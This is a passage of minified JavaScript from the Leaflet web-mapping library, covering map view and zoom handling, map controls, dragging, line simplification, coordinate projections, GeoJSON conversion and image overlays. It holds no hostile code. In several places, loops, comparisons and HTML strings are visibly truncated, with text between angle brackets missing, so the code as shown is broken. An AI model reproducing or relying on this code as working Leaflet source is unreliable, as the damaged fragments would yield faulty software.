0&&this.stopLocate(),this._stop(),$(this._mapPane),this._clearControlPos&&this._clearControlPos(),this._resizeRequest&&(dt(this._resizeRequest),this._resizeRequest=null),this._clearHandlers(),this._loaded&&this.fire("unload");var t;for(t in this._layers)this._layers[t].remove();for(t in this._panes)$(this._panes[t]);return this._layers=[],this._panes=[],delete this._mapPane,delete this._renderer,this},createPane:function(t,e){var i="leaflet-pane"+(t?" leaflet-"+t.replace("Pane","")+"-pane":""),n=U("div",i,e||this._mapPane);return t&&(this._panes[t]=n),n},getCenter:function(){return this._checkIfLoaded(),this._lastCenter&&!this._moved()?this._lastCenter.clone():this.layerPointToLatLng(this._getCenterLayerPoint())},getZoom:function(){return this._zoom},getBounds:function(){var t=this.getPixelBounds(),e=this.unproject(t.getBottomLeft()),i=this.unproject(t.getTopRight());return new vt(e,i)},getMinZoom:function(){return this.options.minZoom===void 0?this._layersMinZoom||0:this.options.minZoom},getMaxZoom:function(){return this.options.maxZoom===void 0?this._layersMaxZoom===void 0?1/0:this._layersMaxZoom:this.options.maxZoom},getBoundsZoom:function(t,e,i){t=it(t),i=Z(i||[0,0]);var n=this.getZoom()||0,o=this.getMinZoom(),s=this.getMaxZoom(),r=t.getNorthWest(),a=t.getSouthEast(),u=this.getSize().subtract(i),c=pt(this.project(a,n),this.project(r,n)).getSize(),y=T.any3d?this.options.zoomSnap:1,C=u.x/c.x,N=u.y/c.y,_t=e?Math.max(C,N):Math.min(C,N);return n=this.getScaleZoom(_t,n),y&&(n=Math.round(n/(y/100))*(y/100),n=e?Math.ceil(n/y)*y:Math.floor(n/y)*y),Math.max(o,Math.min(s,n))},getSize:function(){return(!this._size||this._sizeChanged)&&(this._size=new E(this._container.clientWidth||0,this._container.clientHeight||0),this._sizeChanged=!1),this._size.clone()},getPixelBounds:function(t,e){var i=this._getTopLeftPoint(t,e);return new Q(i,i.add(this.getSize()))},getPixelOrigin:function(){return this._checkIfLoaded(),this._pixelOrigin},getPixelWorldBounds:function(t){return this.options.crs.getProjectedBounds(t===void 0?this.getZoom():t)},getPane:function(t){return typeof t=="string"?this._panes[t]:t},getPanes:function(){return this._panes},getContainer:function(){return this._container},getZoomScale:function(t,e){var i=this.options.crs;return e=e===void 0?this._zoom:e,i.scale(t)/i.scale(e)},getScaleZoom:function(t,e){var i=this.options.crs;e=e===void 0?this._zoom:e;var n=i.zoom(t*i.scale(e));return isNaN(n)?1/0:n},project:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.latLngToPoint(F(t),e)},unproject:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.pointToLatLng(Z(t),e)},layerPointToLatLng:function(t){var e=Z(t).add(this.getPixelOrigin());return this.unproject(e)},latLngToLayerPoint:function(t){var e=this.project(F(t))._round();return e._subtract(this.getPixelOrigin())},wrapLatLng:function(t){return this.options.crs.wrapLatLng(F(t))},wrapLatLngBounds:function(t){return this.options.crs.wrapLatLngBounds(it(t))},distance:function(t,e){return this.options.crs.distance(F(t),F(e))},containerPointToLayerPoint:function(t){return Z(t).subtract(this._getMapPanePos())},layerPointToContainerPoint:function(t){return Z(t).add(this._getMapPanePos())},containerPointToLatLng:function(t){var e=this.containerPointToLayerPoint(Z(t));return this.layerPointToLatLng(e)},latLngToContainerPoint:function(t){return this.layerPointToContainerPoint(this.latLngToLayerPoint(F(t)))},mouseEventToContainerPoint:function(t){return sn(t,this._container)},mouseEventToLayerPoint:function(t){return this.containerPointToLayerPoint(this.mouseEventToContainerPoint(t))},mouseEventToLatLng:function(t){return this.layerPointToLatLng(this.mouseEventToLayerPoint(t))},_initContainer:function(t){var e=this._container=tn(t);if(e){if(e._leaflet_id)throw new Error("Map container is already initialized.")}else throw new Error("Map container not found.");I(e,"scroll",this._onScroll,this),this._containerId=g(e)},_initLayout:function(){var t=this._container;this._fadeAnimated=this.options.fadeAnimation&&T.any3d,A(t,"leaflet-container"+(T.touch?" leaflet-touch":"")+(T.retina?" leaflet-retina":"")+(T.ielt9?" leaflet-oldie":"")+(T.safari?" leaflet-safari":"")+(this._fadeAnimated?" leaflet-fade-anim":""));var e=ue(t,"position");e!=="absolute"&&e!=="relative"&&e!=="fixed"&&e!=="sticky"&&(t.style.position="relative"),this._initPanes(),this._initControlPos&&this._initControlPos()},_initPanes:function(){var t=this._panes={};this._paneRenderers={},this._mapPane=this.createPane("mapPane",this._container),nt(this._mapPane,new E(0,0)),this.createPane("tilePane"),this.createPane("overlayPane"),this.createPane("shadowPane"),this.createPane("markerPane"),this.createPane("tooltipPane"),this.createPane("popupPane"),this.options.markerZoomAnimation||(A(t.markerPane,"leaflet-zoom-hide"),A(t.shadowPane,"leaflet-zoom-hide"))},_resetView:function(t,e,i){nt(this._mapPane,new E(0,0));var n=!this._loaded;this._loaded=!0,e=this._limitZoom(e),this.fire("viewprereset");var o=this._zoom!==e;this._moveStart(o,i)._move(t,e)._moveEnd(o),this.fire("viewreset"),n&&this.fire("load")},_moveStart:function(t,e){return t&&this.fire("zoomstart"),e||this.fire("movestart"),this},_move:function(t,e,i,n){e===void 0&&(e=this._zoom);var o=this._zoom!==e;return this._zoom=e,this._lastCenter=t,this._pixelOrigin=this._getNewPixelOrigin(t),n?i&&i.pinch&&this.fire("zoom",i):((o||i&&i.pinch)&&this.fire("zoom",i),this.fire("move",i)),this},_moveEnd:function(t){return t&&this.fire("zoomend"),this.fire("moveend")},_stop:function(){return dt(this._flyToFrame),this._panAnim&&this._panAnim.stop(),this},_rawPanBy:function(t){nt(this._mapPane,this._getMapPanePos().subtract(t))},_getZoomSpan:function(){return this.getMaxZoom()-this.getMinZoom()},_panInsideMaxBounds:function(){this._enforcingBounds||this.panInsideBounds(this.options.maxBounds)},_checkIfLoaded:function(){if(!this._loaded)throw new Error("Set map center and zoom first.")},_initEvents:function(t){this._targets={},this._targets[g(this._container)]=this;var e=t?K:I;e(this._container,"click dblclick mousedown mouseup mouseover mouseout mousemove contextmenu keypress keydown keyup",this._handleDOMEvent,this),this.options.trackResize&&e(window,"resize",this._onResize,this),T.any3d&&this.options.transform3DLimit&&(t?this.off:this.on).call(this,"moveend",this._onMoveEnd)},_onResize:function(){dt(this._resizeRequest),this._resizeRequest=X(function(){this.invalidateSize({debounceMoveend:!0})},this)},_onScroll:function(){this._container.scrollTop=0,this._container.scrollLeft=0},_onMoveEnd:function(){var t=this._getMapPanePos();Math.max(Math.abs(t.x),Math.abs(t.y))>=this.options.transform3DLimit&&this._resetView(this.getCenter(),this.getZoom())},_findEventTargets:function(t,e){for(var i=[],n,o=e==="mouseout"||e==="mouseover",s=t.target||t.srcElement,r=!1;s;){if(n=this._targets[g(s)],n&&(e==="click"||e==="preclick")&&this._draggableMoved(n)){r=!0;break}if(n&&n.listens(e,!0)&&(o&&!fi(s,t)||(i.push(n),o))||s===this._container)break;s=s.parentNode}return!i.length&&!r&&!o&&this.listens(e,!0)&&(i=[this]),i},_isClickDisabled:function(t){for(;t&&t!==this._container;){if(t._leaflet_disable_click)return!0;t=t.parentNode}},_handleDOMEvent:function(t){var e=t.target||t.srcElement;if(!(!this._loaded||e._leaflet_disable_events||t.type==="click"&&this._isClickDisabled(e))){var i=t.type;i==="mousedown"&&ri(e),this._fireDOMEvent(t,i)}},_mouseEvents:["click","dblclick","mouseover","mouseout","contextmenu"],_fireDOMEvent:function(t,e,i){if(t.type==="click"){var n=l({},t);n.type="preclick",this._fireDOMEvent(n,n.type,i)}var o=this._findEventTargets(t,e);if(i){for(var s=[],r=0;r0?Math.round(t-e)/2:Math.max(0,Math.ceil(t))-Math.max(0,Math.floor(e))},_limitZoom:function(t){var e=this.getMinZoom(),i=this.getMaxZoom(),n=T.any3d?this.options.zoomSnap:1;return n&&(t=Math.round(t/n)*n),Math.max(e,Math.min(i,t))},_onPanTransitionStep:function(){this.fire("move")},_onPanTransitionEnd:function(){tt(this._mapPane,"leaflet-pan-anim"),this.fire("moveend")},_tryAnimatedPan:function(t,e){var i=this._getCenterOffset(t)._trunc();return(e&&e.animate)!==!0&&!this.getSize().contains(i)?!1:(this.panBy(i,e),!0)},_createAnimProxy:function(){var t=this._proxy=U("div","leaflet-proxy leaflet-zoom-animated");this._panes.mapPane.appendChild(t),this.on("zoomanim",function(e){var i=$e,n=this._proxy.style[i];Gt(this._proxy,this.project(e.center,e.zoom),this.getZoomScale(e.zoom,1)),n===this._proxy.style[i]&&this._animatingZoom&&this._onZoomTransitionEnd()},this),this.on("load moveend",this._animMoveEnd,this),this._on("unload",this._destroyAnimProxy,this)},_destroyAnimProxy:function(){$(this._proxy),this.off("load moveend",this._animMoveEnd,this),delete this._proxy},_animMoveEnd:function(){var t=this.getCenter(),e=this.getZoom();Gt(this._proxy,this.project(t,e),this.getZoomScale(e,1))},_catchTransitionEnd:function(t){this._animatingZoom&&t.propertyName.indexOf("transform")>=0&&this._onZoomTransitionEnd()},_nothingToAnimate:function(){return!this._container.getElementsByClassName("leaflet-zoom-animated").length},_tryAnimatedZoom:function(t,e,i){if(this._animatingZoom)return!0;if(i=i||{},!this._zoomAnimated||i.animate===!1||this._nothingToAnimate()||Math.abs(e-this._zoom)>this.options.zoomAnimationThreshold)return!1;var n=this.getZoomScale(e),o=this._getCenterOffset(t)._divideBy(1-1/n);return i.animate!==!0&&!this.getSize().contains(o)?!1:(X(function(){this._moveStart(!0,i.noMoveStart||!1)._animateZoom(t,e,!0)},this),!0)},_animateZoom:function(t,e,i,n){this._mapPane&&(i&&(this._animatingZoom=!0,this._animateToCenter=t,this._animateToZoom=e,A(this._mapPane,"leaflet-zoom-anim")),this.fire("zoomanim",{center:t,zoom:e,noUpdate:n}),this._tempFireZoomEvent||(this._tempFireZoomEvent=this._zoom!==this._animateToZoom),this._move(this._animateToCenter,this._animateToZoom,void 0,!0),setTimeout(_(this._onZoomTransitionEnd,this),250))},_onZoomTransitionEnd:function(){this._animatingZoom&&(this._mapPane&&tt(this._mapPane,"leaflet-zoom-anim"),this._animatingZoom=!1,this._move(this._animateToCenter,this._animateToZoom,void 0,!0),this._tempFireZoomEvent&&this.fire("zoom"),delete this._tempFireZoomEvent,this.fire("move"),this._moveEnd(!0))}});function To(t,e){return new H(t,e)}var Mt=lt.extend({options:{position:"topright"},initialize:function(t){k(this,t)},getPosition:function(){return this.options.position},setPosition:function(t){var e=this._map;return e&&e.removeControl(this),this.options.position=t,e&&e.addControl(this),this},getContainer:function(){return this._container},addTo:function(t){this.remove(),this._map=t;var e=this._container=this.onAdd(t),i=this.getPosition(),n=t._controlCorners[i];return A(e,"leaflet-control"),i.indexOf("bottom")!==-1?n.insertBefore(e,n.firstChild):n.appendChild(e),this._map.on("unload",this.remove,this),this},remove:function(){return this._map?($(this._container),this.onRemove&&this.onRemove(this._map),this._map.off("unload",this.remove,this),this._map=null,this):this},_refocusOnMap:function(t){this._map&&t&&t.screenX>0&&t.screenY>0&&this._map.getContainer().focus()}}),_e=function(t){return new Mt(t)};H.include({addControl:function(t){return t.addTo(this),this},removeControl:function(t){return t.remove(),this},_initControlPos:function(){var t=this._controlCorners={},e="leaflet-",i=this._controlContainer=U("div",e+"control-container",this._container);function n(o,s){var r=e+o+" "+e+s;t[o+s]=U("div",r,i)}n("top","left"),n("top","right"),n("bottom","left"),n("bottom","right")},_clearControlPos:function(){for(var t in this._controlCorners)$(this._controlCorners[t]);$(this._controlContainer),delete this._controlCorners,delete this._controlContainer}});var hn=Mt.extend({options:{collapsed:!0,position:"topright",autoZIndex:!0,hideSingleBase:!1,sortLayers:!1,sortFunction:function(t,e,i,n){return i1,this._baseLayersList.style.display=t?"":"none"),this._separator.style.display=e&&t?"":"none",this},_onLayerChange:function(t){this._handlingClick||this._update();var e=this._getLayer(g(t.target)),i=e.overlay?t.type==="add"?"overlayadd":"overlayremove":t.type==="add"?"baselayerchange":null;i&&this._map.fire(i,e)},_createRadioElement:function(t,e){var i='",n=document.createElement("div");return n.innerHTML=i,n.firstChild},_addItem:function(t){var e=document.createElement("label"),i=this._map.hasLayer(t.layer),n;t.overlay?(n=document.createElement("input"),n.type="checkbox",n.className="leaflet-control-layers-selector",n.defaultChecked=i):n=this._createRadioElement("leaflet-base-layers_"+g(this),i),this._layerControlInputs.push(n),n.layerId=g(t.layer),I(n,"click",this._onInputClick,this);var o=document.createElement("span");o.innerHTML=" "+t.name;var s=document.createElement("span");e.appendChild(s),s.appendChild(n),s.appendChild(o);var r=t.overlay?this._overlaysList:this._baseLayersList;return r.appendChild(e),this._checkDisabledLayers(),e},_onInputClick:function(){if(!this._preventClick){var t=this._layerControlInputs,e,i,n=[],o=[];this._handlingClick=!0;for(var s=t.length-1;s>=0;s--)e=t[s],i=this._getLayer(e.layerId).layer,e.checked?n.push(i):e.checked||o.push(i);for(s=0;s=0;o--)e=t[o],i=this._getLayer(e.layerId).layer,e.disabled=i.options.minZoom!==void 0&&ni.options.maxZoom},_expandIfNotCollapsed:function(){return this._map&&!this.options.collapsed&&this.expand(),this},_expandSafely:function(){var t=this._section;this._preventClick=!0,I(t,"click",ut),this.expand();var e=this;setTimeout(function(){K(t,"click",ut),e._preventClick=!1})}}),Mo=function(t,e,i){return new hn(t,e,i)},di=Mt.extend({options:{position:"topleft",zoomInText:'',zoomInTitle:"Zoom in",zoomOutText:'',zoomOutTitle:"Zoom out"},onAdd:function(t){var e="leaflet-control-zoom",i=U("div",e+" leaflet-bar"),n=this.options;return this._zoomInButton=this._createButton(n.zoomInText,n.zoomInTitle,e+"-in",i,this._zoomIn),this._zoomOutButton=this._createButton(n.zoomOutText,n.zoomOutTitle,e+"-out",i,this._zoomOut),this._updateDisabled(),t.on("zoomend zoomlevelschange",this._updateDisabled,this),i},onRemove:function(t){t.off("zoomend zoomlevelschange",this._updateDisabled,this)},disable:function(){return this._disabled=!0,this._updateDisabled(),this},enable:function(){return this._disabled=!1,this._updateDisabled(),this},_zoomIn:function(t){!this._disabled&&this._map._zoomthis._map.getMinZoom()&&this._map.zoomOut(this._map.options.zoomDelta*(t.shiftKey?3:1))},_createButton:function(t,e,i,n,o){var s=U("a",i,n);return s.innerHTML=t,s.href="#",s.title=e,s.setAttribute("role","button"),s.setAttribute("aria-label",e),de(s),I(s,"click",Kt),I(s,"click",o,this),I(s,"click",this._refocusOnMap,this),s},_updateDisabled:function(){var t=this._map,e="leaflet-disabled";tt(this._zoomInButton,e),tt(this._zoomOutButton,e),this._zoomInButton.setAttribute("aria-disabled","false"),this._zoomOutButton.setAttribute("aria-disabled","false"),(this._disabled||t._zoom===t.getMinZoom())&&(A(this._zoomOutButton,e),this._zoomOutButton.setAttribute("aria-disabled","true")),(this._disabled||t._zoom===t.getMaxZoom())&&(A(this._zoomInButton,e),this._zoomInButton.setAttribute("aria-disabled","true"))}});H.mergeOptions({zoomControl:!0}),H.addInitHook(function(){this.options.zoomControl&&(this.zoomControl=new di,this.addControl(this.zoomControl))});var Co=function(t){return new di(t)},un=Mt.extend({options:{position:"bottomleft",maxWidth:100,metric:!0,imperial:!0},onAdd:function(t){var e="leaflet-control-scale",i=U("div",e),n=this.options;return this._addScales(n,e+"-line",i),t.on(n.updateWhenIdle?"moveend":"move",this._update,this),t.whenReady(this._update,this),i},onRemove:function(t){t.off(this.options.updateWhenIdle?"moveend":"move",this._update,this)},_addScales:function(t,e,i){t.metric&&(this._mScale=U("div",e,i)),t.imperial&&(this._iScale=U("div",e,i))},_update:function(){var t=this._map,e=t.getSize().y/2,i=t.distance(t.containerPointToLatLng([0,e]),t.containerPointToLatLng([this.options.maxWidth,e]));this._updateScales(i)},_updateScales:function(t){this.options.metric&&t&&this._updateMetric(t),this.options.imperial&&t&&this._updateImperial(t)},_updateMetric:function(t){var e=this._getRoundNum(t),i=e<1e3?e+" m":e/1e3+" km";this._updateScale(this._mScale,i,e/t)},_updateImperial:function(t){var e=t*3.2808399,i,n,o;e>5280?(i=e/5280,n=this._getRoundNum(i),this._updateScale(this._iScale,n+" mi",n/i)):(o=this._getRoundNum(e),this._updateScale(this._iScale,o+" ft",o/e))},_updateScale:function(t,e,i){t.style.width=Math.round(this.options.maxWidth*i)+"px",t.innerHTML=e},_getRoundNum:function(t){var e=Math.pow(10,(Math.floor(t)+"").length-1),i=t/e;return i=i>=10?10:i>=5?5:i>=3?3:i>=2?2:1,e*i}}),So=function(t){return new un(t)},ko='',_i=Mt.extend({options:{position:"bottomright",prefix:''+(T.inlineSvg?ko+" ":"")+"Leaflet"},initialize:function(t){k(this,t),this._attributions={}},onAdd:function(t){t.attributionControl=this,this._container=U("div","leaflet-control-attribution"),de(this._container);for(var e in t._layers)t._layers[e].getAttribution&&this.addAttribution(t._layers[e].getAttribution());return this._update(),t.on("layeradd",this._addAttribution,this),this._container},onRemove:function(t){t.off("layeradd",this._addAttribution,this)},_addAttribution:function(t){t.layer.getAttribution&&(this.addAttribution(t.layer.getAttribution()),t.layer.once("remove",function(){this.removeAttribution(t.layer.getAttribution())},this))},setPrefix:function(t){return this.options.prefix=t,this._update(),this},addAttribution:function(t){return t?(this._attributions[t]||(this._attributions[t]=0),this._attributions[t]++,this._update(),this):this},removeAttribution:function(t){return t?(this._attributions[t]&&(this._attributions[t]--,this._update()),this):this},_update:function(){if(this._map){var t=[];for(var e in this._attributions)this._attributions[e]&&t.push(e);var i=[];this.options.prefix&&i.push(this.options.prefix),t.length&&i.push(t.join(", ")),this._container.innerHTML=i.join(' ')}}});H.mergeOptions({attributionControl:!0}),H.addInitHook(function(){this.options.attributionControl&&new _i().addTo(this)});var Eo=function(t){return new _i(t)};Mt.Layers=hn,Mt.Zoom=di,Mt.Scale=un,Mt.Attribution=_i,_e.layers=Mo,_e.zoom=Co,_e.scale=So,_e.attribution=Eo;var Et=lt.extend({initialize:function(t){this._map=t},enable:function(){return this._enabled?this:(this._enabled=!0,this.addHooks(),this)},disable:function(){return this._enabled?(this._enabled=!1,this.removeHooks(),this):this},enabled:function(){return!!this._enabled}});Et.addTo=function(t,e){return t.addHandler(e,this),this};var zo={Events:et},ln=T.touch?"touchstart mousedown":"mousedown",Ut=Ht.extend({options:{clickTolerance:3},initialize:function(t,e,i,n){k(this,n),this._element=t,this._dragStartTarget=e||t,this._preventOutline=i},enable:function(){this._enabled||(I(this._dragStartTarget,ln,this._onDown,this),this._enabled=!0)},disable:function(){this._enabled&&(Ut._dragging===this&&this.finishDrag(!0),K(this._dragStartTarget,ln,this._onDown,this),this._enabled=!1,this._moved=!1)},_onDown:function(t){if(this._enabled&&(this._moved=!1,!ti(this._element,"leaflet-zoom-anim"))){if(t.touches&&t.touches.length!==1){Ut._dragging===this&&this.finishDrag();return}if(!(Ut._dragging||t.shiftKey||t.which!==1&&t.button!==1&&!t.touches)&&(Ut._dragging=this,this._preventOutline&&ri(this._element),ni(),le(),!this._moving)){this.fire("down");var e=t.touches?t.touches[0]:t,i=en(this._element);this._startPoint=new E(e.clientX,e.clientY),this._startPos=qt(this._element),this._parentScale=ai(i);var n=t.type==="mousedown";I(document,n?"mousemove":"touchmove",this._onMove,this),I(document,n?"mouseup":"touchend touchcancel",this._onUp,this)}}},_onMove:function(t){if(this._enabled){if(t.touches&&t.touches.length>1){this._moved=!0;return}var e=t.touches&&t.touches.length===1?t.touches[0]:t,i=new E(e.clientX,e.clientY)._subtract(this._startPoint);!i.x&&!i.y||Math.abs(i.x)+Math.abs(i.y)s&&(r=a,s=u);s>i&&(e[r]=1,pi(t,e,i,n,r),pi(t,e,i,r,o))}function Ao(t,e){for(var i=[t[0]],n=1,o=0,s=t.length;ne&&(i.push(t[n]),o=n);return oe.max.x&&(i|=2),t.ye.max.y&&(i|=8),i}function Bo(t,e){var i=e.x-t.x,n=e.y-t.y;return i*i+n*n}function me(t,e,i,n){var o=e.x,s=e.y,r=i.x-o,a=i.y-s,u=r*r+a*a,c;return u>0&&(c=((t.x-o)*r+(t.y-s)*a)/u,c>1?(o=i.x,s=i.y):c>0&&(o+=r*c,s+=a*c)),r=t.x-o,a=t.y-s,n?r*r+a*a:new E(o,s)}function xt(t){return!q(t[0])||typeof t[0][0]!="object"&&typeof t[0][0]<"u"}function vn(t){return console.warn("Deprecated use of _flat, please use L.LineUtil.isFlat instead."),xt(t)}function gn(t,e){var i,n,o,s,r,a,u,c;if(!t||t.length===0)throw new Error("latlngs not passed");xt(t)||(console.warn("latlngs are not flat! Only the first ring will be used"),t=t[0]);var y=F([0,0]),C=it(t),N=C.getNorthWest().distanceTo(C.getSouthWest())*C.getNorthEast().distanceTo(C.getNorthWest());N<1700&&(y=mi(t));var _t=t.length,at=[];for(i=0;i<_t;i++){var Lt=F(t[i]);at.push(e.project(F([Lt.lat-y.lat,Lt.lng-y.lng])))}for(i=0,n=0;i<_t-1;i++)n+=at[i].distanceTo(at[i+1])/2;if(n===0)c=at[0];else for(i=0,s=0;i<_t-1;i++)if(r=at[i],a=at[i+1],o=r.distanceTo(a),s+=o,s>n){u=(s-n)/o,c=[a.x-u*(a.x-r.x),a.y-u*(a.y-r.y)];break}var gt=e.unproject(Z(c));return F([gt.lat+y.lat,gt.lng+y.lng])}var No={__proto__:null,simplify:dn,pointToSegmentDistance:_n,closestPointOnSegment:Zo,clipSegment:pn,_getEdgeIntersection:Oe,_getBitCode:Yt,_sqClosestPointOnSegment:me,isFlat:xt,_flat:vn,polylineCenter:gn},vi={project:function(t){return new E(t.lng,t.lat)},unproject:function(t){return new j(t.y,t.x)},bounds:new Q([-180,-90],[180,90])},gi={R:6378137,R_MINOR:6356752314245179e-9,bounds:new Q([-2003750834279e-5,-1549657073972e-5],[2003750834279e-5,1876465623138e-5]),project:function(t){var e=Math.PI/180,i=this.R,n=t.lat*e,o=this.R_MINOR/i,s=Math.sqrt(1-o*o),r=s*Math.sin(n),a=Math.tan(Math.PI/4-n/2)/Math.pow((1-r)/(1+r),s/2);return n=-i*Math.log(Math.max(a,1e-10)),new E(t.lng*e*i,n)},unproject:function(t){for(var e=180/Math.PI,i=this.R,n=this.R_MINOR/i,o=Math.sqrt(1-n*n),s=Math.exp(-t.y/i),r=Math.PI/2-2*Math.atan(s),a=0,u=.1,c;a<15&&Math.abs(u)>1e-7;a++)c=o*Math.sin(r),c=Math.pow((1-c)/(1+c),o/2),u=Math.PI/2-2*Math.atan(s*c)-r,r+=u;return new j(r*e,t.x*e/i)}},Do={__proto__:null,LonLat:vi,Mercator:gi,SphericalMercator:Ve},Ro=l({},Wt,{code:"EPSG:3395",projection:gi,transformation:function(){var t=.5/(Math.PI*gi.R);return re(t,.5,-t,.5)}()}),yn=l({},Wt,{code:"EPSG:4326",projection:vi,transformation:re(1/180,1,-1/180,.5)}),Fo=l({},Zt,{projection:vi,transformation:re(1,0,-1,0),scale:function(t){return Math.pow(2,t)},zoom:function(t){return Math.log(t)/Math.LN2},distance:function(t,e){var i=e.lng-t.lng,n=e.lat-t.lat;return Math.sqrt(i*i+n*n)},infinite:!0});Zt.Earth=Wt,Zt.EPSG3395=Ro,Zt.EPSG3857=qe,Zt.EPSG900913=Gn,Zt.EPSG4326=yn,Zt.Simple=Fo;var Ct=Ht.extend({options:{pane:"overlayPane",attribution:null,bubblingMouseEvents:!0},addTo:function(t){return t.addLayer(this),this},remove:function(){return this.removeFrom(this._map||this._mapToAdd)},removeFrom:function(t){return t&&t.removeLayer(this),this},getPane:function(t){return this._map.getPane(t?this.options[t]||t:this.options.pane)},addInteractiveTarget:function(t){return this._map._targets[g(t)]=this,this},removeInteractiveTarget:function(t){return delete this._map._targets[g(t)],this},getAttribution:function(){return this.options.attribution},_layerAdd:function(t){var e=t.target;if(e.hasLayer(this)){if(this._map=e,this._zoomAnimated=e._zoomAnimated,this.getEvents){var i=this.getEvents();e.on(i,this),this.once("remove",function(){e.off(i,this)},this)}this.onAdd(e),this.fire("add"),e.fire("layeradd",{layer:this})}}});H.include({addLayer:function(t){if(!t._layerAdd)throw new Error("The provided object is not a Layer.");var e=g(t);return this._layers[e]?this:(this._layers[e]=t,t._mapToAdd=this,t.beforeAdd&&t.beforeAdd(this),this.whenReady(t._layerAdd,t),this)},removeLayer:function(t){var e=g(t);return this._layers[e]?(this._loaded&&t.onRemove(this),delete this._layers[e],this._loaded&&(this.fire("layerremove",{layer:t}),t.fire("remove")),t._map=t._mapToAdd=null,this):this},hasLayer:function(t){return g(t)in this._layers},eachLayer:function(t,e){for(var i in this._layers)t.call(e,this._layers[i]);return this},_addLayers:function(t){t=t?q(t)?t:[t]:[];for(var e=0,i=t.length;ethis._layersMaxZoom&&this.setZoom(this._layersMaxZoom),this.options.minZoom===void 0&&this._layersMinZoom&&this.getZoom()=2&&e[0]instanceof j&&e[0].equals(e[i-1])&&e.pop(),e},_setLatLngs:function(t){At.prototype._setLatLngs.call(this,t),xt(this._latlngs)&&(this._latlngs=[this._latlngs])},_defaultShape:function(){return xt(this._latlngs[0])?this._latlngs[0]:this._latlngs[0][0]},_clipPoints:function(){var t=this._renderer._bounds,e=this.options.weight,i=new E(e,e);if(t=new Q(t.min.subtract(i),t.max.add(i)),this._parts=[],!(!this._pxBounds||!this._pxBounds.intersects(t))){if(this.options.noClip){this._parts=this._rings;return}for(var n=0,o=this._rings.length,s;nt.y!=o.y>t.y&&t.x<(o.x-n.x)*(t.y-n.y)/(o.y-n.y)+n.x&&(e=!e);return e||At.prototype._containsPoint.call(this,t,!0)}});function Ko(t,e){return new ie(t,e)}var Bt=It.extend({initialize:function(t,e){k(this,e),this._layers={},t&&this.addData(t)},addData:function(t){var e=q(t)?t:t.features,i,n,o;if(e){for(i=0,n=e.length;i0&&o.push(o[0].slice()),o}function ne(t,e){return t.feature?l({},t.feature,{geometry:e}):De(e)}function De(t){return t.type==="Feature"||t.type==="FeatureCollection"?t:{type:"Feature",properties:{},geometry:t}}var xi={toGeoJSON:function(t){return ne(this,{type:"Point",coordinates:Pi(this.getLatLng(),t)})}};Ze.include(xi),yi.include(xi),Ie.include(xi),At.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=Ne(this._latlngs,e?1:0,!1,t);return ne(this,{type:(e?"Multi":"")+"LineString",coordinates:i})}}),ie.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=e&&!xt(this._latlngs[0]),n=Ne(this._latlngs,i?2:e?1:0,!0,t);return e||(n=[n]),ne(this,{type:(i?"Multi":"")+"Polygon",coordinates:n})}}),te.include({toMultiPoint:function(t){var e=[];return this.eachLayer(function(i){e.push(i.toGeoJSON(t).geometry.coordinates)}),ne(this,{type:"MultiPoint",coordinates:e})},toGeoJSON:function(t){var e=this.feature&&this.feature.geometry&&this.feature.geometry.type;if(e==="MultiPoint")return this.toMultiPoint(t);var i=e==="GeometryCollection",n=[];return this.eachLayer(function(o){if(o.toGeoJSON){var s=o.toGeoJSON(t);if(i)n.push(s.geometry);else{var r=De(s);r.type==="FeatureCollection"?n.push.apply(n,r.features):n.push(r)}}}),i?ne(this,{geometries:n,type:"GeometryCollection"}):{type:"FeatureCollection",features:n}}});function xn(t,e){return new Bt(t,e)}var Yo=xn,Re=Ct.extend({options:{opacity:1,alt:"",interactive:!1,crossOrigin:!1,errorOverlayUrl:"",zIndex:1,className:""},initialize:function(t,e,i){this._url=t,this._bounds=it(e),k(this,i)},onAdd:function(){this._image||(this._initImage(),this.options.opacity<1&&this._updateOpacity()),this.options.interactive&&(A(this._image,"leaflet-interactive"),this.addInteractiveTarget(this._image)),this.getPane().appendChild(this._image),this._reset()},onRemove:function(){$(this._image),this.options.interactive&&this.removeInteractiveTarget(this._image)},setOpacity:function(t){return this.options.opacity=t,this._image&&this._updateOpacity(),this},setStyle:function(t){return t.opacity&&this.setOpacity(t.opacity),this},bringToFront:function(){return this._map&&Qt(this._image),this},bringToBack:function(){return this._map&&$t(this._image),this},setUrl:function(t){return this._url=t,this._image&&(this._image.src=t),this},setBounds:function(t){return this._bounds=it(t),this._map&&this._reset(),this},getEvents:function(){var t={zoom:this._reset,viewreset:this._reset};return this._zoomAnimated&&(t.zoomanim=this._animateZoom),t},setZIndex:function(t){return this.options.zIndex=t,this._updateZIndex(),this},getBounds:function(){return this._bounds},getElement:function(){return this._image},_initImage:function(){var t=this._url.tagName==="IMG",e=this._image=t?this._url:U("img");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onload=_(this.fire,this,"load"),e.onerror=_(this._overlayOnError,this,"error"),(this.options.crossOrigin||this.options.crossOrigin==="")&&(e.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),this.options.zIndex&&this._updateZIndex(),t){this._url=e.src;return}e.src=this._url,e.alt=this.options.alt},_animateZoom:function(t){var e=this._map.getZoomScale(t.zoom),i=this._map._latLngBoundsToNewLayerBounds(this._bounds,t.zoom,t.center).min;Gt(this._image,i,e)},_reset:function(){var t=this._image,e=new Q(this._map.latLngToLayerPoint(this._bounds.getNorthWest()),this._map.latLngToLayerPoint(this._bounds.getSouthEast())),i=e.getSize();nt(t,e.min),t.style.width=i.x+"px",t.style.height=i.y+"px"},_updateOpacity:function(){Pt(this._image,this.options.opacity)},_updateZIndex:function(){this._image&&this.options.zIndex!==void 0&&this.options.zIndex!==null&&(this._image.style.zIndex=this.options.zIndex)},_overlayOnError:function(){this.fire("error");var t=this.options.errorOverlayUrl;t&&this._url!==t&&(this._url=t,this._image.src=t)},getCenter:function(){return this._bounds.getCenter()}}),Jo=function(t,e,i){return new Re(t,e,i)},Ln=Re.extend({options:{autoplay:!0,loop:!0,keepAspectRatio:!0,muted:!1,playsInline:!0},_initImage:function(){var 